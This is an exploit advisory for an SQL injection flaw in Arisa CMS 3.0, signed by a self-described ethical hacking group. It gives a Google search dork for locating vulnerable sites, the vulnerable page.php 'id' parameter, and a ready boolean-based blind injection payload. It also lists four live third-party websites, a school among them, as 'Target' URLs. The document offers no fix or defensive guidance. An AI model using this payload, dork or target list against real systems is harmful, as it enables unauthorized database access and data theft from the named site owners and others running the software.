[+] Exploit Title ; Arisa cms sql injection vulnerability
[+] Date : 2018-01-17
[+] Author : 0p3n3r From IRANIAN ETHICAL HACKERS
[+] Vendor Homepage : http://www.iwww.ir/
[+] Version : 3.0
[+] Dork : intext:"گروه نرم افزاری آریسا"
[+] Forum : irethicalhackers.com/forums
[+] Tested On : windows 10 - kali linux 2.0
[+] Contact : https://telegram.me/WebServer
[+] Description :
[!] Arisa Is a personal content management
[+] Poc :
[+] Security Level :
[!] High
[+] Exploitation Technique:
[!] Remote
[+] web application technology: Apache
[+] back-end DBMS: MySQL >= MySQL >= 5.0.0
[+] Vulnerability Files :
[*] page.php
[+] Parameter: id (GET)
[!] Type: boolean-based blind
[!] Title: AND boolean-based blind - WHERE or HAVING clause
[!] Payload: id=contact' AND 4870=4870 AND 'EEov'='EEov
[+] Target :
[!] http://shahabschool.ir/page.php?id=contact
[!] http://mail.eivar.org/page.php?id=contact
[!] http://www.saeedshayan.com/page.php?id=contact
[!] http://www.iwww.ir/page.php?id=contact
[+] We Are : Mehrdad_ice [+] 0P3N3R [+]